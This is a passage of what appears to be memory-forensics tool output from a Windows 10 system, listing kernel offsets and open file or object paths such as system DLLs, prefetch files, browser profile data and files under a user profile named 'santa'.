\Connect 216 +0x918b76c31450 \Windows\System32\en-US\Conhost.exe.mui 216 +0x918b76c315e0 \Windows\Prefetch\GAMEBAR.EXE-E79FA3B9.pf 216 +0x918b76c31770 \$Directory 216 +0x918b76c31a90 \Windows\System32\wscproxystub.dll 216 +0x918b76c31c20 \Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe 216 +0x918b76c31db0 \ProgramData\USOShared\Logs\UsoCoreWorker.5922ac36-0a80-4ccf-8043-a7181bce1717.1.etl 216 +0x918b76c32260 \Windows\System32 216 +0x918b76c323f0 \Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\wdscore.dll 216 +0x918b76c32580 \Windows\System32\SgrmEnclave.dll 216 +0x918b76c32710 \Windows\servicing\en-US\TrustedInstaller.exe.mui 216 +0x918b76c328a0 \Windows\System32\SgrmBroker.exe 216 +0x918b76c32a30 \$Directory 216 +0x918b76c32bc0 \CMApi 216 +0x918b76c32d50 \Windows 216 +0x918b76c32ee0 \Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy 216 +0x918b76c33200 \Windows\Registration\R000000000006.clb 216 +0x918b76c33520 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b76c336b0 \Windows\System32\MusNotification.exe 216 +0x918b76c33840 \Windows\System32\en-US\user32.dll.mui 216 +0x918b76c339d0 \Windows\System32\config\COMPONENTS 216 +0x918b76c33b60 \$Directory 216 +0x918b76c33cf0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 216 +0x918b76c341a0 \Windows\Logs\CBS\CBS.log 216 +0x918b76c34330 \$Directory 216 +0x918b76c34650 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 216 +0x918b76c34970 \$Directory 216 +0x918b76c34b00 \Windows\System32\SecurityCenterBroker.dll 216 +0x918b76c34c90 \Windows\System32\svchost.exe 216 +0x918b76c34e20 \Windows\System32\wscsvc.dll 216 +0x918b76c352d0 \Windows\System32\vaultsvc.dll 216 +0x918b76c355f0 \ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B 216 +0x918b76c35780 \ProgramData\USOShared\Logs\UpdateSessionOrchestration.995347a8-2a9e-48af-bbd5-03147fb77e7a.1.etl 216 +0x918b76c35910 \Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\TiWorker.exe 216 +0x918b76c35aa0 \Users\santa\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper 216 +0x918b76c35c30 \Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx 216 +0x918b76c35dc0 \Users\desktop.ini 216 +0x918b76c360e0 \Windows\System32\vbsapi.dll 216 +0x918b76c36270 \Windows\Registration\R000000000006.clb 216 +0x918b76c36590 \$Directory 216 +0x918b76c36720 \Windows\System32\en-US\Windows.Web.dll.mui 216 +0x918b76c368b0 \Windows\System32\en-US\dps.dll.mui 216 +0x918b76c36a40 \Windows\servicing\CbsApi.dll 216 +0x918b76c36bd0 \Windows\Logs\waasmedic\waasmedic.20231118_133142_776.etl 216 +0x918b76c36d60 \Windows\System32 216 +0x918b76c36ef0 \$Directory 216 +0x918b76c37080 \Windows\Prefetch\TIWORKER.EXE-2CF725E4.pf 216 +0x918b76c37210 \Windows\System32\usosvc.dll 216 +0x918b76c37530 \Windows\Prefetch\BACKGROUNDTASKHOST.EXE-A7A4C1BC.pf 216 +0x918b76c376c0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b76c37850 \$Directory 216 +0x918b76c379e0 \Windows\System32\Phoneutil.dll 216 +0x918b76c37b70 \Windows\System32 216 +0x918b76c37e90 \Server 216 +0x918b76c381b0 \Reference 216 +0x918b76c38340 \Windows\System32\syncutil.dll 216 +0x918b76c387f0 \Windows\System32\InprocLogger.dll 216 +0x918b76c38980 \Windows\System32\SecurityCenterBrokerPS.dll 216 +0x918b76c39150 \Windows\System32\dmcfgutils.dll 216 +0x918b76c392e0 \Windows\System32\APHostService.dll 216 +0x918b76c39470 \Windows\Registration\R000000000006.clb 216 +0x918b76c39600 \Windows\System32\MCCSPal.dll 216 +0x918b76c39790 \Windows\System32\dmxmlhelputils.dll 216 +0x918b76c39920 \Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll 216 +0x918b76c39ab0 \Windows\System32\clbcatq.dll 216 +0x918b76c39dd0 \Windows\System32\SyncController.dll 216 +0x918b76c3a0f0 \Windows\System32\UserDataPlatformHelperUtil.dll 216 +0x918b76c3a280 \Windows\System32\UserDataLanguageUtil.dll 216 +0x918b76c3a410 \Windows\System32\cemapi.dll 216 +0x918b76c3a5a0 \Windows\System32\en-US\combase.dll.mui 216 +0x918b76c3a730 \Windows\System32\en-US\wscapi.dll.mui 216 +0x918b76c3a8c0 \Windows\System32\networkhelper.dll 216 +0x918b76c3aa50 \Windows\System32\MCCSEngineShared.dll 216 +0x918b76c3abe0 \Windows\SysWOW64\CoreMessaging.dll 216 +0x918b76c3ad70 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5 216 +0x918b76c3b090 \$Directory 216 +0x918b76c3b220 \Windows\System32\en-US\vaultsvc.dll.mui 216 +0x918b76c3b3b0 \Output 216 +0x918b76c3b540 \CMApi 216 +0x918b76c3b860 \$Directory 216 +0x918b76c3b9f0 \Input 216 +0x918b76c3bb80 \Windows\System32\conhost.exe 216 +0x918b76c3bd10 \Windows\Prefetch\SEARCHFILTERHOST.EXE-10E4267C.pf 216 +0x918b76c3bea0 \Windows\System32\en-US\wscapi.dll.mui 216 +0x918b76c3c1c0 \$Directory 216 +0x918b76c3c4e0 \$Directory 216 +0x918b76c3c670 \Windows\SysWOW64\netapi32.dll 216 +0x918b76c3c800 \Windows\System32\en-US\winlogon.exe.mui 216 +0x918b76c3ccb0 \CMApi 216 +0x918b76c3ce40 \Windows\SysWOW64\dsreg.dll 216 +0x918b76c3d160 \Windows\SysWOW64\netutils.dll 216 +0x918b76c3d2f0 \Users\santa\AppData\Local\Temp\MicrosoftEdgeUpdate.log 216 +0x918b76c3d480 \Windows\Logs\CBS\CBS.log 216 +0x918b76c3d610 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json 216 +0x918b76c3d7a0 \$Directory 216 +0x918b76c3d930 \Windows\Registration\R000000000006.clb 216 +0x918b76c3dac0 \Windows\SysWOW64\wkscli.dll 216 +0x918b76c3dc50 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\msedgeupdate.dll 216 +0x918b76c3dde0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b76c3e100 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b76c3e290 \Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\dpx.dll 216 +0x918b76c3e420 \CMNotify 216 +0x918b76c3e5b0 \Windows\System32\usocoreworker.exe 216 +0x918b76c3e740 \Windows\Fonts\seguiemj.ttf 216 +0x918b76c3e8d0 \Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\wcp.dll 216 +0x918b76c3ea60 \Windows\System32\appraiser.dll 216 +0x918b76c3ebf0 \ProgramData\USOShared\Logs\NotificationUxBroker.c139137b-83b1-4da1-b306-622cab502fe6.1.etl 216 +0x918b76c3ed80 \CMApi 216 +0x918b76c3f0a0 \Windows\SysWOW64\CoreUIComponents.dll 216 +0x918b76c3f230 \gecko.4576.3988.7767695392285246638 216 +0x918b76c3f3c0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76c3f550 \Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7 216 +0x918b76c3f870 \Windows\System32\srclient.dll 216 +0x918b76c3fa00 \gecko.4576.3988.7767695392285246638 216 +0x918b76c3fb90 \Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TM.blf 216 +0x918b76c3feb0 \Windows\Prefetch\USOCOREWORKER.EXE-C7204344.pf 216 +0x918b76c40360 \Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\CbsCore.dll 216 +0x918b76c404f0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite 216 +0x918b76c40680 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\msedgeupdateres_en.dll 216 +0x918b76c40810 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db 216 +0x918b76c409a0 \Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\drupdate.dll 216 +0x918b76c40cc0 \ProgramData\USOShared\Logs\NotificationUxBroker.a7a36037-3ce8-4ec4-9156-3161dd9df5c3.1.etl 216 +0x918b76c40e50 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b76c41170 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76c41300 \Windows\System32\mssvp.dll 216 +0x918b76c41490 \Windows\Prefetch\MPSIGSTUB.EXE-4D562760.pf 216 +0x918b76c41620 \Windows\System32\devinv.dll 216 +0x918b76c417b0 \Program Files (x86)\Mozilla Firefox 216 +0x918b76c41ad0 \$Directory 216 +0x918b76c41c60 \Windows\System32\SearchProtocolHost.exe 216 +0x918b76c41df0 \Program Files (x86)\Mozilla Firefox 216 +0x918b76c42110 \Windows\SysWOW64\winnsi.dll 216 +0x918b76c425c0 \Windows\System32 216 +0x918b76c428e0 \Windows\DiagTrack\RemoteAggregatorTriggerCriteria.dat 216 +0x918b76c42a70 \Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140.dll 216 +0x918b76c42c00 \Users\santa\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk 216 +0x918b76c42d90 \Windows\Prefetch\SPPSVC.EXE-7B160CA5.pf 216 +0x918b76c430b0 \CMApi 216 +0x918b76c43240 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{2773188F-807D-421F-A1B6-5644661909DA}.catalogItem 216 +0x918b76c433d0 \Windows\Registration\R000000000006.clb 216 +0x918b76c43560 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{28F6A877-7AF5-4A73-BD3E-BBBC65150B75}.catalogItem 216 +0x918b76c436f0 \Windows 216 +0x918b76c43a10 \Windows\WinSxS\FileMaps\$$.cdf-ms 216 +0x918b76c43d30 \Windows\Registration\R000000000006.clb 216 +0x918b76c43ec0 \Users\santa\Documents\desktop.ini 216 +0x918b76c44370 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep 216 +0x918b76c44500 \Windows\SysWOW64\twinapi.dll 216 +0x918b76c44690 \Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\SkypeContext.dll 216 +0x918b76c44820 \$Directory 216 +0x918b76c449b0 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal 216 +0x918b76c44b40 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep 216 +0x918b76c44cd0 \Windows\System32\apisampling.dll 216 +0x918b76c44e60 \Windows\appcompat\Programs\EncapsulationLogging.hve 216 +0x918b76c45180 \LOCAL\cubeb-pipe-4576-11 216 +0x918b76c45310 \Windows\appcompat\Programs\EncapsulationLogging.hve.LOG1 216 +0x918b76c454a0 \Windows\System32\en-US\kernel32.dll.mui 216 +0x918b76c45630 \Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140_1.dll 216 +0x918b76c457c0 \Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\vccorlib140.dll 216 +0x918b76c45950 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\PartyWin.dll 216 +0x918b76c45ae0 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eModel.dll 216 +0x918b76c45c70 \CMNotify 216 +0x918b76c45e00 \$Directory 216 +0x918b76c46120 \$Directory 216 +0x918b76c462b0 \Users\santa\Favorites\desktop.ini 216 +0x918b76c46440 \Windows\System32\pcacli.dll 216 +0x918b76c465d0 \Windows\appcompat\Programs\EncapsulationLogging.hve.LOG2 216 +0x918b76c46760 \CMApi 216 +0x918b76c468f0 \Users\santa\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1680_1050_POS4.jpg 216 +0x918b76c46a80 \Users\santa\Links\desktop.ini 216 +0x918b76c46c10 \Windows\System32\Windows.ApplicationModel.Store.dll 216 +0x918b76c46da0 \Users\santa\Contacts\desktop.ini 216 +0x918b76c470c0 \Users\santa\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini 216 +0x918b76c47250 \Program Files\Windows Defender\EppManifest.dll 216 +0x918b76c473e0 \Windows\SysWOW64\winrnr.dll 216 +0x918b76c47570 \Program Files (x86)\Mozilla Firefox\gkcodecs.dll 216 +0x918b76c47700 \Windows\SysWOW64\ktmw32.dll 216 +0x918b76c47890 \Windows\System32\en-US\rpcrt4.dll.mui 216 +0x918b76c47bb0 \Windows\SysWOW64\propsys.dll 216 +0x918b76c47d40 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{705BA990-0A9C-4A9F-A7C7-6BABF1AA8561}.catalogItem 216 +0x918b76c481f0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{78F02305-4404-49C5-A8E5-A254035C0D00}.catalogItem 216 +0x918b76c48380 \Program Files (x86)\Mozilla Firefox\lgpllibs.dll 216 +0x918b76c48510 \$Directory 216 +0x918b76c486a0 \CMApi 216 +0x918b76c48830 \Windows\SysWOW64\dbghelp.dll 216 +0x918b76c489c0 \Program Files (x86)\Mozilla Firefox\xul.dll 216 +0x918b76c48b50 \Windows\System32\werconcpl.dll 216 +0x918b76c48ce0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db 216 +0x918b76c48e70 \Windows\SysWOW64\uxtheme.dll 216 +0x918b76c49190 \Users\santa\AppData\Local\Mozilla\Firefox\SkeletonUILock-dc0b1b25 216 +0x918b76c49320 \Program Files (x86)\Mozilla Firefox\nss3.dll 216 +0x918b76c494b0 \LOCAL\cubeb-pipe-4576-11 216 +0x918b76c49640 \gecko.4576.3988.7509070130796334379 216 +0x918b76c497d0 \Windows\System32\zipfldr.dll 216 +0x918b76c49960 \Windows\System32\winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx 216 +0x918b76c49af0 \Windows\System32 216 +0x918b76c49c80 \Windows\SysWOW64\ntmarta.dll 216 +0x918b76c49e10 \Users\santa\Saved Games\desktop.ini 216 +0x918b76c4a130 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{6846259E-BE8D-4862-8F7D-56766A0C1B25}.catalogItem 216 +0x918b76c4a2c0 \Windows\SysWOW64\wsock32.dll 216 +0x918b76c4a770 \Windows\System32\D3D12.dll 216 +0x918b76c4a900 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{839C59D0-6565-477F-90A2-9982A4FB6C68}.catalogItem 216 +0x918b76c4aa90 \CMApi 216 +0x918b76c4ac20 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{7A9E1E0B-D13E-488D-9D39-AB555896082D}.catalogItem 216 +0x918b76c4b0d0 \$Directory 216 +0x918b76c4b260 \Windows\ImmersiveControlPanel\pris\resources.en-US.pri 216 +0x918b76c4b3f0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\Dow3CDC.tmp 216 +0x918b76c4b580 \Windows\System32 216 +0x918b76c4b710 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\Logs\Log-GameBarLoggingSession-1.etl 216 +0x918b76c4bbc0 \Windows\SysWOW64\NapiNSP.dll 216 +0x918b76c4bd50 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\parent.lock 216 +0x918b76c4bee0 \Windows\Fonts\cambria.ttc 216 +0x918b76c4c200 \Program Files (x86)\Mozilla Firefox\browser\omni.ja 216 +0x918b76c4c390 \Windows\System32\ApplicationFrameHost.exe 216 +0x918b76c4c520 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe 216 +0x918b76c4c840 \Windows\System32\eShims.dll 216 +0x918b76c4c9d0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194 216 +0x918b76c4cb60 \Windows\Prefetch\GAMEBARFTSERVER.EXE-5CD4C30E.pf 216 +0x918b76c4ccf0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{79C1C918-E8E6-4677-97FF-FA895DE7EC72}.catalogItem 216 +0x918b76c4ce80 \Windows\System32 216 +0x918b76c4d1a0 \Windows\SysWOW64\dbgcore.dll 216 +0x918b76c4d330 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{7B761C10-8206-40A4-B307-DB82578FD72C}.catalogItem 216 +0x918b76c4d4c0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b76c4d650 \$Directory 216 +0x918b76c4d7e0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9552323B-F7B9-43CE-8A02-4A183C60D532}.catalogItem 216 +0x918b76c4d970 \CMApi 216 +0x918b76c4db00 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat 216 +0x918b76c4dc90 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat 216 +0x918b76c4de20 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat.LOG2 216 +0x918b76c4e140 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b76c4e2d0 \Windows\Registration\R000000000006.clb 216 +0x918b76c4eaa0 \$Directory 216 +0x918b76c4ec30 \Windows\System32 216 +0x918b76c4f0e0 \ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33.dat 216 +0x918b76c4f270 \Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll 216 +0x918b76c4f400 \$Directory 216 +0x918b76c4f590 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{87AF66AC-E501-4D45-8CDA-9EF297CFF3B2}.catalogItem 216 +0x918b76c4f720 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 216 +0x918b76c4f8b0 \Windows\Registration\R000000000006.clb 216 +0x918b76c4fa40 \ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33_COM15.dat 216 +0x918b76c4fbd0 \CMNotify 216 +0x918b76c4fd60 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat.LOG1 216 +0x918b76c4fef0 \Program Files (x86)\desktop.ini 216 +0x918b76c50080 \Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eData.dll 216 +0x918b76c50210 \Windows\System32\XblAuthManagerProxy.dll 216 +0x918b76c503a0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b76c50530 \Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx 216 +0x918b76c506c0 \Program Files (x86)\Mozilla Firefox\omni.ja 216 +0x918b76c50850 \Windows\SysWOW64\winmm.dll 216 +0x918b76c509e0 \Windows\System32 216 +0x918b76c50b70 \ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33_COM15.dat.LOG2 216 +0x918b76c50d00 \ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33.dat 216 +0x918b76c50e90 \Windows\Registration\R000000000006.clb 216 +0x918b76c511b0 \Users\desktop.ini 216 +0x918b76c51340 \Windows\System32\svchost.exe 216 +0x918b76c514d0 \Windows\System32\en-US\kernel32.dll.mui 216 +0x918b76c51660 \Users\santa\Videos\Captures\desktop.ini 216 +0x918b76c517f0 \Users\santa\Pictures\wallpaper.png 216 +0x918b76c51980 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\INetCache\ZA002JGD\ab[1].json 216 +0x918b76c51b10 \Windows\System32\ShellExperiences\WindowsInternal.Xaml.Controls.Tabs.dll 216 +0x918b76c51ca0 \CMApi 216 +0x918b76c51e30 \Windows\System32\Windows.WARP.JITService.exe 216 +0x918b76c52150 \ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\465f7e52ad88feb7.dat 216 +0x918b76c522e0 \CMNotify 216 +0x918b76c52470 \Windows\Fonts\segoeui.ttf 216 +0x918b76c52600 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20231118133215.txt 216 +0x918b76c52790 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\XboxGameBarFT.winmd 216 +0x918b76c52920 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 216 +0x918b76c52ab0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b76c52c40 \Windows\rescache\_merged\1348407519\4258637282.pri 216 +0x918b76c52dd0 \$Directory 216 +0x918b76c530f0 \Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\startupCache\scriptCache-current.bin 216 +0x918b76c53280 \Windows\SysWOW64\nlaapi.dll 216 +0x918b76c53410 \Windows\System32\Windows.System.Profile.RetailInfo.dll 216 +0x918b76c53730 \Windows\System32\AssignedAccessRuntime.dll 216 +0x918b76c538c0 \Windows\SysWOW64\WinTypes.dll 216 +0x918b76c53a50 \ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33_COM15.dat.LOG1 216 +0x918b76c53be0 \Windows\System32\taskhostw.exe 216 +0x918b76c53d70 \Windows\System32\Windows.System.Diagnostics.dll 216 +0x918b76c54220 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76c543b0 \Windows\SysWOW64\winmmbase.dll 216 +0x918b76c54540 \Windows\SysWOW64\webauthn.dll 216 +0x918b76c546d0 \Windows\SysWOW64\devobj.dll 216 +0x918b76c54860 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppLockscreen\wallpaper.png 216 +0x918b76c549f0 \Windows\SysWOW64\wshbth.dll 216 +0x918b76c54ea0 \$Directory 216 +0x918b76c551c0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b76c554e0 \Windows\bcastdvr\KnownGameList.bin 216 +0x918b76c55670 \$Directory 216 +0x918b76c55990 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b76c55b20 \$Directory 216 +0x918b76c55cb0 \srvsvc 216 +0x918b76c55e40 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76c56160 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppLockscreen\wallpaper.png 216 +0x918b76c56480 \Windows\System32\browserbroker.dll 216 +0x918b76c567a0 \Endpoint 216 +0x918b76c56930 \Windows\System32\duser.dll 216 +0x918b76c56ac0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b76c56c50 \Users\santa\Pictures\desktop.ini 216 +0x918b76c56de0 \Windows\SysWOW64\dhcpcsvc.dll 216 +0x918b76c57100 \Windows\System32\browser_broker.exe 216 +0x918b76c57420 \AsyncConnectHlp 216 +0x918b76c575b0 \gecko.4576.3988.11027459119419464105 216 +0x918b76c57740 \Windows\SysWOW64\netprofm.dll 216 +0x918b76c578d0 \gecko.4576.3988.11027459119419464105 216 +0x918b76c57a60 \Windows\Registration\R000000000006.clb 216 +0x918b76c57bf0 \Endpoint 216 +0x918b76c57d80 \$Directory 216 +0x918b76c580a0 \Endpoint 216 +0x918b76c583c0 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 216 +0x918b76c58550 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log 216 +0x918b76c586e0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb 216 +0x918b76c58870 \Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\entries\90986EF1909EF6B5244F9775F7FBF9E3ADD68DE9 216 +0x918b76c58a00 \$Directory 216 +0x918b76c58b90 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 216 +0x918b76c58d20 \Windows\System32\ClipSVC.dll 216 +0x918b76c58eb0 \Windows\SystemResources\Windows.UI.ShellCommonInetCore\pris\Windows.UI.ShellCommonInetCore.en-US.pri 216 +0x918b76c591d0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log 216 +0x918b76c59360 \$Directory 216 +0x918b76c594f0 \Windows\Registration\R000000000006.clb 216 +0x918b76c59680 \$Directory 216 +0x918b76c59810 \$Directory 216 +0x918b76c599a0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm 216 +0x918b76c59cc0 \Windows\System32\RuntimeBroker.exe 216 +0x918b76c59e50 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm 216 +0x918b76c5a170 \Windows\System32\ActivationClient.dll 216 +0x918b76c5a300 \Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 216 +0x918b76c5a490 \Windows\System32\AppExtension.dll 216 +0x918b76c5a620 \ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Home.swidtag 216 +0x918b76c5a7b0 \CMNotify 216 +0x918b76c5a940 \Windows\SystemResources\shell32.dll.mun 216 +0x918b76c5aad0 \$Directory 216 +0x918b76c5ac60 \Windows\System32\dllhost.exe 216 +0x918b76c5adf0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b76c5b110 